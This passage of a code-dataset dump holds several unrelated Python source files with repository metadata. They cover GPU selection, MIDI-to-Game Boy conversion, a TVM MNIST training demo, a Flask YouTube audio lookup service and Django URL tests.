of selected devices\n    \"\"\"\n    pynvml.nvmlInit()\n    gpunum = pynvml.nvmlDeviceGetCount()\n    assert(k <= gpunum)\n    metric_list = []\n    for idx in range(gpunum):\n        handle = pynvml.nvmlDeviceGetHandleByIndex(idx)\n\n        if metric in [\"util\", \"utilization\"]:\n            util_rate = pynvml.nvmlDeviceGetUtilizationRates(handle)\n            metric_list.append((util_rate.gpu, idx))\n        else:\n            mem_info = pynvml.nvmlDeviceGetMemoryInfo(handle)\n            mem_use_rate = 1.0 - mem_info.free / mem_info.total\n            metric_list.append((mem_use_rate, idx))\n    # sort the devices with ascending metric\n    metric_list = sorted(metric_list, key=lambda x:x[0])\n    selected_idx = [str(x[1]) for x in metric_list[:k]]\n    # set the visible devices\n    os.environ[\"CUDA_VISIBLE_DEVICES\"] = \",\".join(selected_idx)", "repo_name": "yuanmu97/nvselector", "sub_path": "nvselector/selector.py", "file_name": "selector.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pynvml.nvmlInit", "line_number": 14, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetCount", "line_number": 15, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetHandleByIndex", "line_number": 19, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetUtilizationRates", "line_number": 22, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetMemoryInfo", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "73690337473", "text": "\"\"\"\nMain program. Assembles and plays a Game Boy song from the provided MIDI file. \nTakes three arguments: the MIDI file to parse, a number from 1-255 which controls the song's tempo,\nand a number which controls the pitch. \n\"\"\"\n\nimport sys \nimport re\nimport math\nfrom collections import Counter \nimport subprocess\nfrom ByteUtils import *\n\nMIN_PITCH = -6\nMAX_PITCH = 2\n\n#http://www.music.mcgill.ca/~ich/classes/mumt306/StandardMIDIfileformat.html#BMA1_\nEVENT_NOTE_OFF = 0x80\nEVENT_NOTE_ON = 0x90\nEVENT_CONTROL_CHANGE = 0xB0\nEVENT_PROGRAM_CHANGE = 0xC0\n\nSTRING_NOTE_OFF = \"Note Off\"\nSTRING_NOTE_ON = \"Note On\"\nSTRING_CONTROL_CHANGE = \"Control Change\"\nSTRING_PROGRAM_CHANGE = \"Program Change\"\nSTRING_EVENT_UNKNOWN = \"Unknown\"\n\nHighestNoteIndex = 38\n\n\n\"\"\" Contains all the tracks of a single MIDI file, plus the file header. 
\nThere's also some metadata relating to tempo and timing, which this program doesn't use.\"\"\"\nclass MidiFile:\n    header = -1\n    metricalTiming = -1\n    globalTempoTrack = -1\n    tracks = -1\n    \n    def __init__(self, header, metricalTiming,globalTempoTrack,tracks):\n        self.header = header\n        self.metricalTiming = metricalTiming\n        self.globalTempoTrack = globalTempoTrack\n        self.tracks = tracks\n    \n    def PrintTracks(self):\n        for i in range(0,len(self.tracks)):\n            track = self.tracks[i]\n            highestNote = max([e.note for e in track.events])\n            lowestNote = min([e.note for e in track.events])\n            outOfBoundsCount = (len([e for e in track.events if e.note>HighestNoteIndex or e.note<0]))\n            print(str(i) + \"\\t\" + track.title)\n            print(\"Length: \" + str(len(track.events)))\n            print(\"Highest:\" + str(highestNote))\n            print(\"Lowest: \" + str(lowestNote)) \n            print(\"Num out of bounds: \" + str(outOfBoundsCount))\n            print('\\n')\n    \n    def MergeTracks(self):\n        title = \"\"\n        events = list()\n        for t in self.tracks:\n            events = events + t.events\n            title = title + t.title + \", \"\n        list.sort(events,key=lambda x: x.timeStamp)\n        self.tracks = [MidiTrack(title,events)]\n    \n    def RemoveDrums(self):\n        \"\"\" Can't map drum tracks to a melody, unless you want your songs turned into hardcore Eurobeat.\n        They should probably be implemented by the Game Boy's noise channel. \n        I haven't done that yet, so I just get rid of drums for now.\"\"\"\n        \n        drums = [t for t in self.tracks if \"drum\" in t.title.lower()]\n        print(\"Removing \" + str(len(drums)) + \" drum tracks.\")\n        \n        self.tracks = [t for t in self.tracks if \"drum\" not in t.title.lower()]\n        #Yes, it's a hack. A better solution would be to check the patch number\n        #(http://www.music.mcgill.ca/~ich/classes/mumt306/StandardMIDIfileformat.html#BM1_4)\n    \n    def RemoveEmptyTracks(self):\n        self.tracks = [t for t in self.tracks if len(t.events) > 0]\n    \n\n    def PeekTrack(self,index,maxlength):\n        print(\"Peeking track: \" + self.tracks[index].title)\n        length = min(maxlength,len(self.tracks[index].events))\n        \n        for i in range(0,length):\n            print(self.tracks[index].events[i])\n\n\"\"\"Single track of a MIDI. Usually a single instrument.\"\"\"\nclass MidiTrack:\n    title = \"\"\n    events = []\n    lastProgramChangeTime = 0\n    def __init__(self, title, events):\n        self.title = title\n        self.events = events\n        \n        pcs = sorted((e for e in events if e.eventType == STRING_PROGRAM_CHANGE), key=lambda e: e.timeStamp)\n        if(len(pcs) > 0):\n            self.lastProgramChangeTime = pcs[0].timeStamp\n    \n\n\n\"\"\"MIDI event. Beginning of note, end of note, etc. 
\nWe don't do sustained notes, so we're only really interested in note beginnings.\"\"\"\nclass MidiEvent:\n eventType = \"none\"\n note = -1\n deltaTime = -1\n timeStamp = -1\n \n eventBytes = []\n def __init__(self, eventType, note):\n self.eventType = eventType\n self.note = note\n def __str__(self):\n return \"TimeStamp:\" + str(self.timeStamp) + \"\\t\\t\" + str(self.eventType) + \"\\t\\tNote:\" + str(self.note) + \"\\t\\tDeltaTime:\" + str(self.deltaTime)\n\n\"\"\" Parse an entire MIDI blob.\"\"\"\ndef ReadRawMidiData(dump):\n print(\"Reading MIDI file.\")\n txt = ReadAsText(dump,0,len(dump),printWhileReading=False)\n splits = re.split('MThd|MTrk',txt)\n splits = [[ord(s) for s in split] for split in splits if len(split) > 0]\n header = splits[0][4:10]\n print(str(header[3]) + \" tracks discovered.\") \n \n \n if(header[1] == 2):\n print(\"Midi Header format 2: cannot parse.\")\n return False\n elif(header[1] == 1 or header[1] == 0):\n metricalTiming = (header[4]*256)+header[5]\n globalTempoTrack = splits[1]\n \n tracks = list()\n startOfTracks = 1\n #if(header[1] == 0):\n # startOfTracks = 1\n #startOfTracks = 1 \n for i in range(startOfTracks,len(splits)):\n track = splits[i][5:]\n \n titleLength = track[2]\n title = \"\".join([chr(c) for c in track[3:3+titleLength]])\n trackWithoutTitle = track[4+titleLength:]\n trackEvents = ReadMidiTrack(trackWithoutTitle)\n \n track = MidiTrack(title,trackEvents)\n tracks.append(track)\n \n return MidiFile(header,metricalTiming,globalTempoTrack,tracks)\n else:\n print(\"Unknown header type \" + str(header[1]) + \", could not make midi object.\")\n\n\n\"\"\" Parse an individual MIDI track.\"\"\"\ndef ReadMidiTrack(track):\n events = []\n cursor = 0\n totalTime = 0\n while(cursor0]\n\n\"\"\"Lowers the song's pitch so that the lowest note is at index 0, which is a C.\nWe only have a range of about three octaves, so we need to use everything we have!\"\"\"\ndef NormalizeNotes(events):\n minNote = min([e.note for e in events])\n for e in events:\n e.note-=minNote\n return events\n\n\ndef SetSongPitch(midi,pitchOffset):\n if(pitchOffset == 0):\n return\n elif(pitchOffset > 0 and pitchOffset <= 4):\n for i in range(0,pitchOffset):\n ForEachTrack(midi,PushNotesUpHalfOctave)\n elif(pitchOffset < 0 and pitchOffset >= -4):\n for i in range(0,abs(pitchOffset)):\n ForEachTrack(midi,PushNotesDownHalfOctave)\n else:\n print(\"Invalid pitch offset: \" + str(pitchOffset))\n\n\ndef WrapNotesDownOneOctave(events):\n return WrapNotes(events,-12)\ndef WrapNotesUpOneOctave(events):\n return WrapNotes(events,12)\n\ndef PushNotesDownOneOctave(events):\n return PushNotes(events,-12)\ndef PushNotesUpOneOctave(events):\n return PushNotes(events,12)\n\ndef PushNotesDownHalfOctave(events):\n return PushNotes(events,-6)\ndef PushNotesUpHalfOctave(events):\n return PushNotes(events,6)\n\ndef WrapNotes(events,amount=0):\n return PushNotes(events,amount,36)\n\ndef PushNotes(events,amount=0,pushingFactor=12):\n for e in events:\n e.note+=amount\n while(e.note<0):\n e.note+=pushingFactor\n while(e.note>HighestNoteIndex):\n e.note-=pushingFactor\n return events\n\n\"\"\" Recalculate the time gaps between notes after removing irrelevant MIDI events.\"\"\"\ndef RecalculateDeltaTime(events):\n for i in range(0,len(events)-1):\n event = events[i]\n nextTimeStamp = events[i+1].timeStamp\n event.deltaTime = nextTimeStamp-event.timeStamp\n events[len(events)-1].deltaTime = next(e.deltaTime for e in events if e.deltaTime>0)\n return events\n\n\"\"\" Try to downscale the time gaps between 
notes. \nIdeally we want to divide by the greatest common divisor - ie, if all time gaps are 100 or 200 units, we want to divide by 100.\nSmaller intervals are neater, and easier to work with when messing with the song's tempo.\"\"\"\ndef DivideDeltaTime(events):\n    factor = GetDividingFactor(events)\n    for e in events:\n        e.deltaTime = round(e.deltaTime/factor)\n    return events\n\ndef GetDividingFactor(events): \n    deltaTimes = [e.deltaTime for e in midi.tracks[0].events if e.deltaTime>0]\n    mostCommon = Counter(deltaTimes).most_common(1)[0][0] \n    smallerThanMostCommonDeltaTimes = [t for t in set(deltaTimes) if t<mostCommon]\n    factors = [f for f in factorlist(mostCommon) if f>=mostCommon/16]\n    \n    ratiosTotal = dict()\n    for f in factors:\n        ratiosTotal[f] = 0\n        for s in smallerThanMostCommonDeltaTimes:\n            ratio = max([f,s])/min([f,s])\n            ratio = ratio-math.floor(ratio)\n            ratiosTotal[f]+=ratio\n    \n    if(len(ratiosTotal) == 0):\n        return 1\n    #print(\"Ratios total: \" + str(len()))\n\n    ratiosSorted = sorted(ratiosTotal.items(), key = lambda x: (x[1], -x[0]))\n    return ratiosSorted[0][0]\n\ndef factorlist(n): \n    output = list()\n    for i in range(2, int(n/2)+1):\n        if n % i == 0:\n            output.append(i)\n    return output\n\n\"\"\"Converts the track into a format that can be injected into a Game Boy ASM file.\nThe format is extremely simple. Every note is represented by a pair of hexadecimal integers.\nThe first integer is the pitch, starting at C and working upwards. The second integer\nis the delay before playing the next note. This delay is proportional to the speed\nargument in RunSong(). \nIf the Game Boy program reads a 255 for the note's pitch, it exits.\"\"\"\ndef WriteTrackInAsmFormat(track):\n    output = ''\n    output+='\\t'\n    output+=\"db \"\n    for e in track.events:\n        byteNote = '%02x'%(e.note)\n        byteDeltaTime = '%02x'%(e.deltaTime)\n        if(len(byteNote)>2):\n            byteNote = \"FF\"\n        if(len(byteDeltaTime)>2):\n            byteDeltaTime = \"FF\"\n\n        output+=\"&\"\n        output+=byteNote.upper()\n        output+=\",&\"\n        output+=byteDeltaTime.upper()\n        output+=\",\"\n    output+=\"255,255\"\n    return output\n\ndef WriteTrackInPlaintext(track):\n    song = \"\"\n    for e in track.events:\n        song+=(str(e.note)+ \",\" + str(e.deltaTime) + '\\n')\n    return song\n\n\"\"\"Executes a batch script which compiles and plays the song. You need VASM and an emulator. An example script is provided,\nbut if you're using another emulator (or a different version of VASM) you can swap in your own.\nThe delay argument is a hex number in the range 00-FF which decides the tempo of the song.\nLarger delay means a bigger gap between notes, and thus a slower song.\nThe actual delay between notes is proportional to the *square* of this value, so keep that in mind if you're adjusting it. Halving\nthe delay won't double the speed of the song, it'll quadruple it. 
\n\"\"\"\ndef RunSong(asm,noteDelay):\n    asm+='\\nSpeed:\\n\\tdb &'\n    asm+=noteDelay\n    f = open(songBytesFile,'w')\n    f.write(asm)\n    f.close()\n    subprocess.check_output(runGameCommand)\n\nusage_errmsg = \"Usage: MIDI2GB.py <midi file> <tempo 1-255> <pitch -6 to 2>\"\ntempo_errmsg = \"Tempo must be a whole number from 1 to 255.\"\npitch_errmsg = \"Pitch must be a whole number from \" + str(MIN_PITCH) + \" to \" + str(MAX_PITCH) + \".\"\n\nif(len(sys.argv) < 4):\n    print(usage_errmsg)\n    exit(-1)\n\nspeed = sys.argv[2]\nif(not speed.isdigit()):\n    print(tempo_errmsg)\n    exit(-1)\n\nspeed = int(speed)\nif(speed < 1 or speed > 255):\n    print(tempo_errmsg)\n    exit(-1)\n    \npitch = sys.argv[3]\nif(not pitch.lstrip(\"-\").isdigit()):\n    print(pitch_errmsg)\n    exit(-1)\n\npitch = int(pitch)\nif(pitch < MIN_PITCH or pitch > MAX_PITCH):\n    print(pitch_errmsg)\n    exit(-1)\n\n\nspeed = '%x' % speed\nprint(\"Playing song with delay \" + speed + \" and pitch \" + str(pitch))\n\n    \nmidiPath = sys.argv[1]\nsongBytesFile = r\"Song_Bytes.asm\"\nGBSongFile = r\"GB_Song.asm\"\nmakeGameBat = r\"makegame.bat\"\nrunGameCommand = makeGameBat + \" \" + GBSongFile\n\ndump = ReadHexDump(midiPath)\nmidi = ReadRawMidiData(dump)\n\nmidi.RemoveDrums()\n#midi.PrintTracks()\n\nForEachTrack(midi,FilterToNoteOnOnly)\nmidi.RemoveEmptyTracks()\n\nSetStartTimeToFirstProgramChange(midi)\n\nmidi.MergeTracks()\n\nForEachTrack(midi,RecalculateDeltaTime)\nForEachTrack(midi,DivideDeltaTime)\nForEachTrack(midi,NormalizeNotes)\nSetSongPitch(midi,pitch)\n\n#midi.PrintTracks()\n#midi.PeekFirstTrack(30)\n\nasm = WriteTrackInAsmFormat(midi.tracks[0])\n\nRunSong(asm,speed)\n\n#midi.MergeTracks()\n#midi.PeekFirstTrack(30)\n\n#ForEachTrack(midi,WrapNotes)\n#ForEachTrack(midi,WrapNotesUpOneOctave)\n#ForEachTrack(midi,WrapNotesDownOneOctave)\n#ForEachTrack(midi,PushNotes)\n#ForEachTrack(midi,PushNotesUpOneOctave)\n#ForEachTrack(midi,PushNotesDownHalfOctave)", "repo_name": "Simononeill493/MIDI2GB", "sub_path": "MIDI2GB.py", "file_name": "MIDI2GB.py", "file_ext": "py", "file_size_in_byte": 15208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.split", "line_number": 125, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 221, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 311, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 322, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 384, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 390, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 394, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 404, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 419, "usage_type": "attribute"}]} +{"seq_id": "70348573634", "text": "import tvm\nimport topi\nimport numpy as np\nimport time\nimport keras.datasets.mnist as mnist\n\nfrom train.runners import run_tvm\n\n\ndef mnist_load():\n    (Xtr,ytr),(Xte,yte) = mnist.load_data(\"/tmp/mnist.npz\")\n    return (Xtr,ytr),(Xte,yte)\n\ndef mnist_img(ids):\n    return np.expand_dims(mnist_load()[0][0][ids], axis=3).astype(np.float32)\n\ndef mnist_cls(ids):\n    return mnist_load()[0][1][ids]\n\ndef mnist_cls_oh(ids):\n    z=np.zeros((len(ids),10),dtype=np.float32)\n    z[np.arange(len(ids)),mnist_cls(ids)]=1\n    return z.astype(np.float32)\n\ndef get_shape(tensor):\n    return [tvm.ir_pass.Simplify(s).value for s in tensor.shape]\n\n\n\ndef demo_conv2d():\n    lrate = 0.1\n    nbatches = 100 # batches to train\n\n    num_classes = 10\n    batch_size = 10\n    img_h = 28\n    img_w = 28\n    img_c = 1\n\n    f1_c = 4\n    f2_c = 5\n    f3_units = 16\n\n    x = tvm.placeholder((batch_size, img_h, img_w, img_c),name='x')\n    y = tvm.placeholder((batch_size, num_classes),name='y')\n\n    print('Block1')\n    w1 = tvm.placeholder((3,3,img_c,f1_c),name='w1')\n    b1 = tvm.placeholder((f1_c,), name='b1')\n    t = 
topi.nn.conv2d(x, w1, 1, 0, layout='NHWC', out_dtype=tvm.float32)\n t = t + topi.broadcast_to(b1, (batch_size,1,1,f1_c))\n print('Block1: after-biasing shape is', get_shape(t))\n t = topi.nn.pool(t, [2, 2], [2, 2], [0, 0, 0, 0], 'max', layout='NHWC')\n print('Block1: after-pooling shape is', get_shape(t))\n t = topi.nn.relu(t)\n print('Block1: after-relu shape is', get_shape(t))\n\n\n print('Block2')\n w2 = tvm.placeholder((3,3,f1_c,f2_c),name='w2')\n b2 = tvm.placeholder((f2_c,), name='b2')\n t = topi.nn.conv2d(t, w2, 1, 0, layout='NHWC', out_dtype=tvm.float32)\n t = t + topi.broadcast_to(b2, (batch_size,1,1,f2_c))\n print('Block2: after-biasing shape is', get_shape(t))\n t = topi.nn.pool(t, [2, 2], [2, 2], [0, 0, 0, 0], 'max', layout='NHWC')\n print('Block2: after-pooling shape is', get_shape(t))\n t = topi.nn.relu(t)\n print('Block2: after-relu shape is', get_shape(t))\n t = topi.nn.flatten(t)\n print('Block2: after-flattern shape is', get_shape(t))\n\n\n print('Block3')\n w3 = tvm.placeholder((f3_units, get_shape(t)[1]))\n b3 = tvm.placeholder((f3_units,))\n t = topi.nn.dense(t,w3,b3)\n print('Block3: after-dense shape is', get_shape(t))\n\n\n print('Block4')\n w4 = tvm.placeholder((num_classes, get_shape(t)[1]))\n b4 = tvm.placeholder((num_classes,))\n t = topi.nn.dense(t,w4,b4)\n print('Block4: after-dense shape is', get_shape(t))\n t = topi.nn.relu(t)\n\n p = topi.argmax(t,axis=1)\n # TODO: check the correctnesss of the log_softmax expression\n # TODO: figure out the difference between it and standard cross-entropy loss\n l = - topi.sum(y * topi.nn.log_softmax(t)) / batch_size\n\n print('Block4: loss shape is', get_shape(l))\n\n ones = topi.full_like(l, 1.0)\n #[dl_dw1,dl_db1,dl_dw2,dl_db2,dl_dw3,dl_db3,dl_dw4,dl_db4]\n params = [w1,b1,w2,b2,w3,b3,w4,b4]\n\n dl = list(tvm.ir_pass.JacobianRecursive(l, params, ones))\n assert len(params)==len(dl)\n print('dl_dw1 weight is', get_shape(params[0]))\n\n sdl = tvm.create_schedule([p.op for p in [x,y,l] + params + dl])\n mdl = tvm.build(sdl, [x,y,l] + params + dl)\n print('Train+Inference module', mdl)\n\n # sl = tvm.create_schedule([l.op])\n # ml = tvm.build(sdl, [x,y] + params + [l])\n # print('Inference module',ml)\n\n state={}\n for p in params:\n state.update({p:tvm.nd.array(np.random.uniform(-1.0, 1.0, size=get_shape(p)).astype(np.float32))})\n\n grads={}\n for p,g in zip(params,dl):\n grads.update({p:tvm.nd.empty(get_shape(g))})\n\n for ib in range(nbatches):\n b=range(ib*batch_size,(ib+1)*batch_size)\n tx=tvm.nd.array(mnist_img(b))\n ty=tvm.nd.array(mnist_cls_oh(b))\n tl=tvm.nd.empty(shape=(), dtype=tvm.float32)\n\n print('Entering')\n mdl(*([tx,ty,tl]+list(state.values())+list(grads.values())))\n print('Done','loss',tl.asnumpy())\n\n state2={}\n for p in params:\n state2.update({p:tvm.nd.array(state[p].asnumpy()-lrate*grads[p].asnumpy())})\n\n state = state2\n\n\n\n", "repo_name": "grwlf/nixtvm", "sub_path": "src/mironov/train/autodiff_conv.py", "file_name": "autodiff_conv.py", "file_ext": "py", "file_size_in_byte": 3924, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 11, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.expand_dims", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, 
{"api_name": "numpy.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tvm.ir_pass.Simplify", "line_number": 26, "usage_type": "call"}, {"api_name": "tvm.ir_pass", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 44, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 45, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 48, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 49, "usage_type": "call"}, {"api_name": "topi.nn.conv2d", "line_number": 50, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tvm.float32", "line_number": 50, "usage_type": "attribute"}, {"api_name": "topi.broadcast_to", "line_number": 51, "usage_type": "call"}, {"api_name": "topi.nn.pool", "line_number": 53, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "topi.nn.relu", "line_number": 55, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 60, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 61, "usage_type": "call"}, {"api_name": "topi.nn.conv2d", "line_number": 62, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tvm.float32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "topi.broadcast_to", "line_number": 63, "usage_type": "call"}, {"api_name": "topi.nn.pool", "line_number": 65, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "topi.nn.relu", "line_number": 67, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "topi.nn.flatten", "line_number": 69, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 74, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 75, "usage_type": "call"}, {"api_name": "topi.nn.dense", "line_number": 76, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 81, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 82, "usage_type": "call"}, {"api_name": "topi.nn.dense", "line_number": 83, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "topi.nn.relu", "line_number": 85, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 85, "usage_type": "attribute"}, {"api_name": "topi.argmax", "line_number": 87, "usage_type": "call"}, {"api_name": "topi.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "topi.nn.log_softmax", "line_number": 90, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "topi.full_like", "line_number": 94, "usage_type": "call"}, {"api_name": "tvm.ir_pass.JacobianRecursive", "line_number": 98, "usage_type": "call"}, {"api_name": "tvm.ir_pass", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tvm.create_schedule", "line_number": 102, "usage_type": "call"}, {"api_name": "tvm.build", "line_number": 103, "usage_type": "call"}, {"api_name": "tvm.nd.array", 
"line_number": 112, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tvm.nd.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tvm.nd.array", "line_number": 120, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 120, "usage_type": "attribute"}, {"api_name": "tvm.nd.array", "line_number": 121, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 121, "usage_type": "attribute"}, {"api_name": "tvm.nd.empty", "line_number": 122, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tvm.float32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tvm.nd.array", "line_number": 130, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 130, "usage_type": "attribute"}]} +{"seq_id": "33657278901", "text": "from youtube_dl import YoutubeDL\nfrom flask import Flask, render_template, request, url_for, flash, redirect, Response, session, jsonify\napp = Flask(__name__)\n\nhost = '0.0.0.0'\nport = 5387 \nyoutube_options = {\n 'format': 'bestaudio/best',\n 'restrictfilenames': False,\n 'noplaylist': False,\n 'nocheckcertificate': True,\n 'ignoreerrors': False,\n 'logtostderr': False,\n 'quiet': True,\n 'no_warnings': True,\n 'default_search': 'auto',\n 'cachedir': False\n}\n\noutput_from_query = {\n \"session\": {\n \"id\": \"\",\n \"params\": {}\n },\n \"scene\": {\n \"name\": \"\",\n \"slots\": {},\n \"next\": {\n \"name\": \"\"\n }\n },\n}\n\nytdl = YoutubeDL(youtube_options)\n\n\ndef create_query_response(params, session_id, current_scene, next_scene):\n output = output_from_query.copy()\n output['session']['params'] = params\n output['session']['id'] = session_id\n output['scene']['name'] = current_scene\n output['scene']['next']['name'] = next_scene\n return jsonify(output)\n\n\ndef play(params, session):\n if params:\n song_name = params.get(\"song_name\")\n if song_name:\n song_name_parsed = song_name.get(\"resolved\")\n if song_name_parsed:\n song_data = get_query_results(song_name_parsed)\n song_url = song_data.get(\"song_url\")\n channel_name = song_data.get(\"channel_name\")\n actual_song_name = song_data.get(\"song_name\")\n if song_url and actual_song_name and channel_name:\n return create_query_response({\"found\": True, \"song_name\": actual_song_name, \"song_url\": song_url, \"channel_name\": channel_name}, session.get(\"id\"), \"fill_play\", \"start_play\")\n return create_query_response({\"found\": False, \"song_name\": \"\", \"song_url\": \"\", \"channel_name\": \"\"}, session.get(\"id\"), \"fill_play\", \"start_play\")\n\n@app.route(\"/api\", methods=['POST'])\ndef api():\n json_data = request.get_json(force=True)\n handler = json_data.get(\"handler\")\n if handler:\n if handler.get(\"name\") == \"play\":\n intent = json_data.get(\"intent\")\n if intent:\n params = intent.get(\"params\")\n session = json_data.get(\"session\")\n response = play(params, session)\n return response\n return {\"msg\": \"Invalid parameter(s)\"}, 422\n\n\ndef get_query_results(query):\n if not query:\n return {}\n data = ytdl.extract_info(f\"ytsearch:{query}\", download=False)\n search_results = data['entries']\n if not search_results:\n return 
{}\n result = search_results[0]\n song_name = result['title']\n channel_name = result['uploader']\n for format_ in result['formats']:\n if format_['ext'] == 'm4a':\n m4a_url = format_['url']\n return {\"song_name\": song_name, \"channel_name\": channel_name, \"song_url\": m4a_url}\n return {}\n\n\nif __name__ == \"__main__\":\n app.run(host = host, port=port, debug=False)\n\n", "repo_name": "Suhas-13/youtube-action", "sub_path": "youtube-action/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 70, "usage_type": "argument"}]} +{"seq_id": "33181226975", "text": "from django.urls import reverse, resolve\nfrom django.test import TestCase\nfrom matrix.views import coveys_matrix_page, covey_sort_backlog, \\\n update_matrix_task, retire_task_from_matrix, change_matrix_task_state\nfrom django.contrib.auth.models import User\nfrom tasks.models import TaskList, SimpleTask\nfrom django.utils import timezone\nfrom datetime import date\n\n\nclass MatrixUrlsTest(TestCase):\n\n def setUp(self):\n self.add_data()\n self.task_id = SimpleTask.objects.get(name=\"tâche 1\",\n description=\"Description :)\").id\n\n self.tasklist_id = TaskList.objects.get(name=\"Loisirs\",\n color=\"#55b37e\").id\n\n def add_data(self):\n\n user = User.objects.create_user(username=\"test@test.com\",\n password=\"testpassword\")\n\n tasklist = TaskList.objects.create(user=user, name=\"Loisirs\",\n color=\"#55b37e\")\n\n SimpleTask.objects.create(tasklist=tasklist,\n name=\"tâche 1\",\n due_date=date.today(),\n description=\"Description :)\",\n creation=timezone.now(),\n is_done=False)\n\n def test_coveys_matrix_page_url_is_resolved(self):\n url = reverse(coveys_matrix_page)\n self.assertEqual(resolve(url).func, coveys_matrix_page)\n\n def test_covey_sort_backlog_url_is_resolved(self):\n url = reverse(covey_sort_backlog, args=[self.task_id])\n self.assertEqual(resolve(url).func, covey_sort_backlog)\n\n def test_update_matrix_task_url_is_resolved(self):\n url = reverse(update_matrix_task)\n self.assertEqual(resolve(url).func, update_matrix_task)\n\n def test_retire_task_from_matrix_url_is_resolved(self):\n url = reverse(retire_task_from_matrix)\n self.assertEqual(resolve(url).func, retire_task_from_matrix)\n\n def test_change_matrix_task_state_url_is_resolved(self):\n url = reverse(change_matrix_task_state)\n self.assertEqual(resolve(url).func, change_matrix_task_state)\n", "repo_name": "AntoineMaurin/Melius", "sub_path": "matrix/tests/integration/test_urls.py", "file_name": "test_urls.py", "file_ext": "py", "file_size_in_byte": 2206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
